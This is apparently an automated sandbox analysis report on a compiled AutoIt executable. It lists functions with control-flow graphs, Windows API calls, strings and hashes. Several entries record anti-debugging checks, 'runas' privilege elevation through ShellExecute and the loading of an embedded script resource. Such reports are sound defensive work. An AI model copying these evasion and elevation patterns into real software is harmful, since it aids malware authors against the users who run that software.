                                            Function 0082B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 745 82b043-82b080 call 82f8a0 748 82b082-82b084 745->748 749 82b089-82b08b 745->749 750 82b860-82b86c call 82a70c 748->750 751 82b0ac-82b0d9 749->751 752 82b08d-82b0a7 call 827bda call 827c0e call 826e10 749->752 755 82b0e0-82b0e7 751->755 756 82b0db-82b0de 751->756 752->750 758 82b105 755->758 759 82b0e9-82b100 call 827bda call 827c0e call 826e10 755->759 756->755 757 82b10b-82b110 756->757 763 82b112-82b11c call 82f82f 757->763 764 82b11f-82b12d call 833bf2 757->764 758->757 791 82b851-82b854 759->791 763->764 774 82b133-82b145 764->774 775 82b44b-82b45d 764->775 774->775 778 82b14b-82b183 call 827a0d GetConsoleMode 774->778 779 82b463-82b473 775->779 780 82b7b8-82b7d5 WriteFile 775->780 778->775 797 82b189-82b18f 778->797 783 82b55a-82b55f 779->783 784 82b479-82b484 779->784 786 82b7e1-82b7e7 GetLastError 780->786 787 82b7d7-82b7df 780->787 793 82b663-82b66e 783->793 794 82b565-82b56e 783->794 789 82b48a-82b49a 784->789 790 82b81b-82b833 784->790 792 82b7e9 786->792 787->792 798 82b4a0-82b4a3 789->798 799 82b835-82b838 790->799 800 82b83e-82b84e call 827c0e call 827bda 790->800 796 82b85e-82b85f 791->796 802 82b7ef-82b7f1 792->802 793->790 801 82b674 793->801 794->790 795 82b574 794->795 803 82b57e-82b595 795->803 796->750 804 82b191-82b193 797->804 805 82b199-82b1bc GetConsoleCP 797->805 806 82b4a5-82b4be 798->806 807 82b4e9-82b520 WriteFile 798->807 799->800 808 82b83a-82b83c 799->808 800->791 809 82b67e-82b693 801->809 811 82b7f3-82b7f5 802->811 812 82b856-82b85c 802->812 814 82b59b-82b59e 803->814 804->775 804->805 815 82b1c2-82b1ca 805->815 816 82b440-82b446 805->816 817 82b4c0-82b4ca 806->817 818 82b4cb-82b4e7 806->818 807->786 819 82b526-82b538 807->819 808->796 820 82b699-82b69b 809->820 811->790 813 82b7f7-82b7fc 811->813 812->796 822 82b812-82b819 call 827bed 813->822 823 82b7fe-82b810 call 827c0e call 827bda 813->823 824 82b5a0-82b5b6 814->824 825 82b5de-82b627 WriteFile 814->825 826 82b1d4-82b1d6 815->826 816->811 817->818 818->798 818->807 819->802 827 82b53e-82b54f 819->827 828 82b6d8-82b719 WideCharToMultiByte 820->828 829 82b69d-82b6b3 820->829 822->791 823->791 834 82b5b8-82b5ca 824->834 835 82b5cd-82b5dc 824->835 825->786 837 82b62d-82b645 825->837 838 82b36b-82b36e 826->838 839 82b1dc-82b1fe 826->839 827->789 840 82b555 827->840 828->786 833 82b71f-82b721 828->833 841 82b6c7-82b6d6 829->841 842 82b6b5-82b6c4 829->842 846 82b727-82b75a WriteFile 833->846 834->835 835->814 835->825 837->802 848 82b64b-82b658 837->848 843 82b370-82b373 838->843 844 82b375-82b3a2 838->844 849 82b200-82b215 839->849 850 82b217-82b223 call 821688 839->850 840->802 841->820 841->828 842->841 843->844 851 82b3a8-82b3ab 843->851 844->851 853 82b77a-82b78e GetLastError 846->853 854 82b75c-82b776 846->854 848->803 855 82b65e 848->855 856 82b271-82b283 call 8340f7 849->856 869 82b225-82b239 850->869 870 82b269-82b26b 850->870 858 82b3b2-82b3c5 call 835884 851->858 859 82b3ad-82b3b0 851->859 863 82b794-82b796 853->863 854->846 861 82b778 854->861 855->802 872 82b435-82b43b 856->872 873 82b289 856->873 858->786 879 82b3cb-82b3d5 858->879 859->858 865 82b407-82b40a 859->865 861->863 863->792 868 82b798-82b7b0 863->868 865->826 875 82b410 865->875 868->809 874 82b7b6 868->874 876 82b412-82b42d 869->876 877 82b23f-82b254 call 8340f7 869->877 870->856 872->792 880 82b28f-82b2c4 WideCharToMultiByte 873->880 874->802 875->872 876->872 877->872 885 82b25a-82b267 877->885 882 82b3d7-82b3ee call 835884 879->882 883 82b3fb-82b401 879->883 880->872 884 82b2ca-82b2f0 WriteFile 880->884 882->786 890 82b3f4-82b3f5 882->890 883->865 884->786 887 82b2f6-82b30e 884->887 885->880 887->872 889 82b314-82b31b 887->889 889->883 891 82b321-82b34c WriteFile 889->891 890->883 891->786 892 82b352-82b359 891->892 892->872 893 82b35f-82b366 892->893 893->883
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30e5756d09003d182592edd410640edd75c1f75834d5e857d63743b35418f2c6
                                            • Instruction ID: 9ab8697476285561240a70cbb5a329cb9f2724916d2738cc0b0687457389901d
                                            • Opcode Fuzzy Hash: 30e5756d09003d182592edd410640edd75c1f75834d5e857d63743b35418f2c6
                                            • Instruction Fuzzy Hash: CE324E75A122288FCB249F58EC85AE9B7B5FF46314F5840D9E40AE7A81D7309EC0CF52
                                            Function 00803D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00803AA3,?), ref: 00803D45
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,00803AA3,?), ref: 00803D57
                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,008C1148,008C1130,?,?,?,?,00803AA3,?), ref: 00803DC8
                                              • Part of subcall function 00806430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00803DEE,008C1148,?,?,?,?,?,00803AA3,?), ref: 00806471
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,00803AA3,?), ref: 00803E48
                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008B28F4,00000010), ref: 00871CCE
                                            • SetCurrentDirectoryW.KERNEL32(?,008C1148,?,?,?,?,?,00803AA3,?), ref: 00871D06
                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0089DAB4,008C1148,?,?,?,?,?,00803AA3,?), ref: 00871D89
                                            • ShellExecuteW.SHELL32(00000000,?,?,?,?,00803AA3), ref: 00871D90
                                              • Part of subcall function 00803E6E: GetSysColorBrush.USER32(0000000F), ref: 00803E79
                                              • Part of subcall function 00803E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00803E88
                                              • Part of subcall function 00803E6E: LoadIconW.USER32(00000063), ref: 00803E9E
                                              • Part of subcall function 00803E6E: LoadIconW.USER32(000000A4), ref: 00803EB0
                                              • Part of subcall function 00803E6E: LoadIconW.USER32(000000A2), ref: 00803EC2
                                              • Part of subcall function 00803E6E: RegisterClassExW.USER32(?), ref: 00803F30
                                              • Part of subcall function 008036B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008036E6
                                              • Part of subcall function 008036B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00803707
                                              • Part of subcall function 008036B8: ShowWindow.USER32(00000000,?,?,?,?,00803AA3,?), ref: 0080371B
                                              • Part of subcall function 008036B8: ShowWindow.USER32(00000000,?,?,?,?,00803AA3,?), ref: 00803724
                                              • Part of subcall function 00804FFC: _memset.LIBCMT ref: 00805022
                                              • Part of subcall function 00804FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008050CB
                                            Strings
                                            • runas, xrefs: 00871D84
                                            • This is a third-party compiled AutoIt script., xrefs: 00871CC8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                            • API String ID: 438480954-3287110873
                                            • Opcode ID: 9ccb49ea9b6aea9ee679e711af393e748a7a8d8e75c160361f1d5951bf754226
                                            • Instruction ID: b27142ecf41f98a3dc110e211db1bc9f0dd4b2173c303b09575d2e73ae818038
                                            • Opcode Fuzzy Hash: 9ccb49ea9b6aea9ee679e711af393e748a7a8d8e75c160361f1d5951bf754226
                                            • Instruction Fuzzy Hash: 3E510B31A04248AECF51ABF8DC89EEE7B79FF06714F044169F511E22D3DA749645CB22
                                            Function 0081DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1142 81ddc0-81de4f call 80d7f7 GetVersionExW call 806a63 call 81dfb4 call 806571 1151 81de55-81de56 1142->1151 1152 8724c8-8724cb 1142->1152 1153 81de92-81dea2 call 81df77 1151->1153 1154 81de58-81de63 1151->1154 1155 8724e4-8724e8 1152->1155 1156 8724cd 1152->1156 1173 81dea4-81dec1 GetCurrentProcess call 81df5f 1153->1173 1174 81dec7-81dee1 1153->1174 1159 81de69-81de6b 1154->1159 1160 87244e-872454 1154->1160 1157 8724d3-8724dc 1155->1157 1158 8724ea-8724f3 1155->1158 1162 8724d0 1156->1162 1157->1155 1158->1162 1165 8724f5-8724f8 1158->1165 1166 81de71-81de74 1159->1166 1167 872469-872475 1159->1167 1163 872456-872459 1160->1163 1164 87245e-872464 1160->1164 1162->1157 1163->1153 1164->1153 1165->1157 1171 872495-872498 1166->1171 1172 81de7a-81de89 1166->1172 1169 872477-87247a 1167->1169 1170 87247f-872485 1167->1170 1169->1153 1170->1153 1171->1153 1177 87249e-8724b3 1171->1177 1178 87248a-872490 1172->1178 1179 81de8f 1172->1179 1173->1174 1193 81dec3 1173->1193 1175 81df31-81df3b GetSystemInfo 1174->1175 1176 81dee3-81def7 call 81e00c 1174->1176 1182 81df0e-81df1a 1175->1182 1190 81df29-81df2f GetSystemInfo 1176->1190 1191 81def9-81df01 call 81dff4 GetNativeSystemInfo 1176->1191 1184 8724b5-8724b8 1177->1184 1185 8724bd-8724c3 1177->1185 1178->1153 1179->1153 1187 81df21-81df26 1182->1187 1188 81df1c-81df1f FreeLibrary 1182->1188 1184->1153 1185->1153 1188->1187 1192 81df03-81df07 1190->1192 1191->1192 1192->1182 1196 81df09-81df0c FreeLibrary 1192->1196 1193->1174 1196->1182
                                            APIs
                                            • GetVersionExW.KERNEL32(?), ref: 0081DDEC
                                            • GetCurrentProcess.KERNEL32(00000000,0089DC38,?,?), ref: 0081DEAC
                                            • GetNativeSystemInfo.KERNELBASE(?,0089DC38,?,?), ref: 0081DF01
                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0081DF0C
                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0081DF1F
                                            • GetSystemInfo.KERNEL32(?,0089DC38,?,?), ref: 0081DF29
                                            • GetSystemInfo.KERNEL32(?,0089DC38,?,?), ref: 0081DF35
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                            • String ID:
                                            • API String ID: 3851250370-0
                                            • Opcode ID: 1f0dc6f7e8df6efde12211bb088a2e9842802142ea1b6654b8c2bd60fef797cb
                                            • Instruction ID: a84de83f9e6f27986a79f402eb8398c993d0ad373af5398abda96eeac82597f4
                                            • Opcode Fuzzy Hash: 1f0dc6f7e8df6efde12211bb088a2e9842802142ea1b6654b8c2bd60fef797cb
                                            • Instruction Fuzzy Hash: C661A5B180A384CBCF15CF6898C12E97FB4FF29304B1985D9D849DF24BC624C549CB69
                                            Function 0080406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1214 80406b-804083 CreateStreamOnHGlobal 1215 8040a3-8040a6 1214->1215 1216 804085-80409c FindResourceExW 1214->1216 1217 874f16-874f25 LoadResource 1216->1217 1218 8040a2 1216->1218 1217->1218 1219 874f2b-874f39 SizeofResource 1217->1219 1218->1215 1219->1218 1220 874f3f-874f4a LockResource 1219->1220 1220->1218 1221 874f50-874f58 1220->1221 1222 874f5c-874f6e 1221->1222 1222->1218
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0080449E,?,?,00000000,00000001), ref: 0080407B
                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0080449E,?,?,00000000,00000001), ref: 00804092
                                            • LoadResource.KERNEL32(?,00000000,?,?,0080449E,?,?,00000000,00000001,?,?,?,?,?,?,008041FB), ref: 00874F1A
                                            • SizeofResource.KERNEL32(?,00000000,?,?,0080449E,?,?,00000000,00000001,?,?,?,?,?,?,008041FB), ref: 00874F2F
                                            • LockResource.KERNEL32(0080449E,?,?,0080449E,?,?,00000000,00000001,?,?,?,?,?,?,008041FB,00000000), ref: 00874F42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                            • String ID: SCRIPT
                                            • API String ID: 3051347437-3967369404
                                            • Opcode ID: b65f6558fc2ad6a07286cfd4c2b20b41db033488670f684d03b60872fd5c49ca
                                            • Instruction ID: f2cbe8d0aa23218c7b98972215e9979e031a0f241ac9d47ed478eb73dbb5602e
                                            • Opcode Fuzzy Hash: b65f6558fc2ad6a07286cfd4c2b20b41db033488670f684d03b60872fd5c49ca
                                            • Instruction Fuzzy Hash: 39112E71240701AFE7618B65EC48F277BB9FBC5B51F10456CF612D6290DBB1EC008A20
                                            Function 00846CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00872F49), ref: 00846CB9
                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00846CCA
                                            • FindClose.KERNEL32(00000000), ref: 00846CDA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FileFind$AttributesCloseFirst
                                            • String ID:
                                            • API String ID: 48322524-0
                                            • Opcode ID: 3a124ef4812cba490aa6f36063245270d189e7d5d00fd96aa1bbbd152de0f3f4
                                            • Instruction ID: 8f2a8b237b34cf6e34ddb951120a5cbabcf4e54e462023f0f79b66701406922b
                                            • Opcode Fuzzy Hash: 3a124ef4812cba490aa6f36063245270d189e7d5d00fd96aa1bbbd152de0f3f4
                                            • Instruction Fuzzy Hash: 69E04F35814619AB8220673CEC8D8EAB7ACFF06339F104716F976C21E0FB74D95486D6
                                            Function 00813200 Relevance: 1.0, Instructions: 986COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID:
                                            • API String ID: 3964851224-0
                                            • Opcode ID: 75b6d0af3695acdc986cb7c0f047d407c2323c668d5bb4ead20725025821e892
                                            • Instruction ID: 709549a4ecbd3a224aee71b6f932c3ffc7fe7bce1237ebcbc323f4205bbc9db2
                                            • Opcode Fuzzy Hash: 75b6d0af3695acdc986cb7c0f047d407c2323c668d5bb4ead20725025821e892
                                            • Instruction Fuzzy Hash: B7923A706083419FD724DF18C484BAAB7E9FF84308F14885DE99ACB3A2D775E985CB52
                                            Function 0080E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0080E959
                                            • timeGetTime.WINMM ref: 0080EBFA
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0080ED2E
                                            • TranslateMessage.USER32(?), ref: 0080ED3F
                                            • DispatchMessageW.USER32(?), ref: 0080ED4A
                                            • LockWindowUpdate.USER32(00000000), ref: 0080ED79
                                            • DestroyWindow.USER32 ref: 0080ED85
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0080ED9F
                                            • Sleep.KERNEL32(0000000A), ref: 00875270
                                            • TranslateMessage.USER32(?), ref: 008759F7
                                            • DispatchMessageW.USER32(?), ref: 00875A05
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00875A19
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                            • API String ID: 2641332412-570651680
                                            • Opcode ID: a3b5a3c8f11aeeb17cb6b86abd4b88e796e1db64215751e71a6b5e9c82c2d920
                                            • Instruction ID: f2d81fd83bee2cbc0b17b79b71c55469a5d747b6af18564c2e936cb1417464c5
                                            • Opcode Fuzzy Hash: a3b5a3c8f11aeeb17cb6b86abd4b88e796e1db64215751e71a6b5e9c82c2d920
                                            • Instruction Fuzzy Hash: 8962AD705083448FEB64DF28CC95BAA77A4FF55304F08496DE98ACB2D6DBB1D848CB52
                                            Function 00835C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • ___createFile.LIBCMT ref: 00835EC3
                                            • ___createFile.LIBCMT ref: 00835F04
                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00835F2D
                                            • __dosmaperr.LIBCMT ref: 00835F34
                                            • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00835F47
                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00835F6A
                                            • __dosmaperr.LIBCMT ref: 00835F73
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00835F7C
                                            • __set_osfhnd.LIBCMT ref: 00835FAC
                                            • __lseeki64_nolock.LIBCMT ref: 00836016
                                            • __close_nolock.LIBCMT ref: 0083603C
                                            • __chsize_nolock.LIBCMT ref: 0083606C
                                            • __lseeki64_nolock.LIBCMT ref: 0083607E
                                            • __lseeki64_nolock.LIBCMT ref: 00836176
                                            • __lseeki64_nolock.LIBCMT ref: 0083618B
                                            • __close_nolock.LIBCMT ref: 008361EB
                                              • Part of subcall function 0082EA9C: CloseHandle.KERNELBASE(00000000,008AEEF4,00000000,?,00836041,008AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0082EAEC
                                              • Part of subcall function 0082EA9C: GetLastError.KERNEL32(?,00836041,008AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0082EAF6
                                              • Part of subcall function 0082EA9C: __free_osfhnd.LIBCMT ref: 0082EB03
                                              • Part of subcall function 0082EA9C: __dosmaperr.LIBCMT ref: 0082EB25
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            • __lseeki64_nolock.LIBCMT ref: 0083620D
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00836342
                                            • ___createFile.LIBCMT ref: 00836361
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0083636E
                                            • __dosmaperr.LIBCMT ref: 00836375
                                            • __free_osfhnd.LIBCMT ref: 00836395
                                            • __invoke_watson.LIBCMT ref: 008363C3
                                            • __wsopen_helper.LIBCMT ref: 008363DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                            • String ID: @
                                            • API String ID: 3896587723-2766056989
                                            • Opcode ID: f2d8cd53fa1914e6fcc783858360b75aad7fa0e2f887a73ab6c6a001356cc404
                                            • Instruction ID: 309bac3e87f296f2ce84d819458b616fd89e5a368d4847f7035e4385d60fbd96
                                            • Opcode Fuzzy Hash: f2d8cd53fa1914e6fcc783858360b75aad7fa0e2f887a73ab6c6a001356cc404
                                            • Instruction Fuzzy Hash: BB22177190060AABEF299F6CDC55BAD7B71FB80324F288229E511EB2D1D7358D60C7D1
                                            Function 0084FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • _wcscpy.LIBCMT ref: 0084FA96
                                            • _wcschr.LIBCMT ref: 0084FAA4
                                            • _wcscpy.LIBCMT ref: 0084FABB
                                            • _wcscat.LIBCMT ref: 0084FACA
                                            • _wcscat.LIBCMT ref: 0084FAE8
                                            • _wcscpy.LIBCMT ref: 0084FB09
                                            • __wsplitpath.LIBCMT ref: 0084FBE6
                                            • _wcscpy.LIBCMT ref: 0084FC0B
                                            • _wcscpy.LIBCMT ref: 0084FC1D
                                            • _wcscpy.LIBCMT ref: 0084FC32
                                            • _wcscat.LIBCMT ref: 0084FC47
                                            • _wcscat.LIBCMT ref: 0084FC59
                                            • _wcscat.LIBCMT ref: 0084FC6E
                                              • Part of subcall function 0084BFA4: _wcscmp.LIBCMT ref: 0084C03E
                                              • Part of subcall function 0084BFA4: __wsplitpath.LIBCMT ref: 0084C083
                                              • Part of subcall function 0084BFA4: _wcscpy.LIBCMT ref: 0084C096
                                              • Part of subcall function 0084BFA4: _wcscat.LIBCMT ref: 0084C0A9
                                              • Part of subcall function 0084BFA4: __wsplitpath.LIBCMT ref: 0084C0CE
                                              • Part of subcall function 0084BFA4: _wcscat.LIBCMT ref: 0084C0E4
                                              • Part of subcall function 0084BFA4: _wcscat.LIBCMT ref: 0084C0F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                            • String ID: >>>AUTOIT SCRIPT<<<
                                            • API String ID: 2955681530-2806939583
                                            • Opcode ID: 37e9565524ea0f0abaf8e942ef2ef369aaee7e31ccd1114585f174913ff7d73d
                                            • Instruction ID: 895bdfe65aa7eda511b5153a72b61abf891c63492148a770cb432a155b890fcf
                                            • Opcode Fuzzy Hash: 37e9565524ea0f0abaf8e942ef2ef369aaee7e31ccd1114585f174913ff7d73d
                                            • Instruction Fuzzy Hash: B291A171504319AFDB20EB58C891E9AB3E8FF54310F00496DFA99D7292DB34EA54CF92
                                            Function 0084BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0084BDB4: __time64.LIBCMT ref: 0084BDBE
                                              • Part of subcall function 00804517: _fseek.LIBCMT ref: 0080452F
                                            • __wsplitpath.LIBCMT ref: 0084C083
                                              • Part of subcall function 00821DFC: __wsplitpath_helper.LIBCMT ref: 00821E3C
                                            • _wcscpy.LIBCMT ref: 0084C096
                                            • _wcscat.LIBCMT ref: 0084C0A9
                                            • __wsplitpath.LIBCMT ref: 0084C0CE
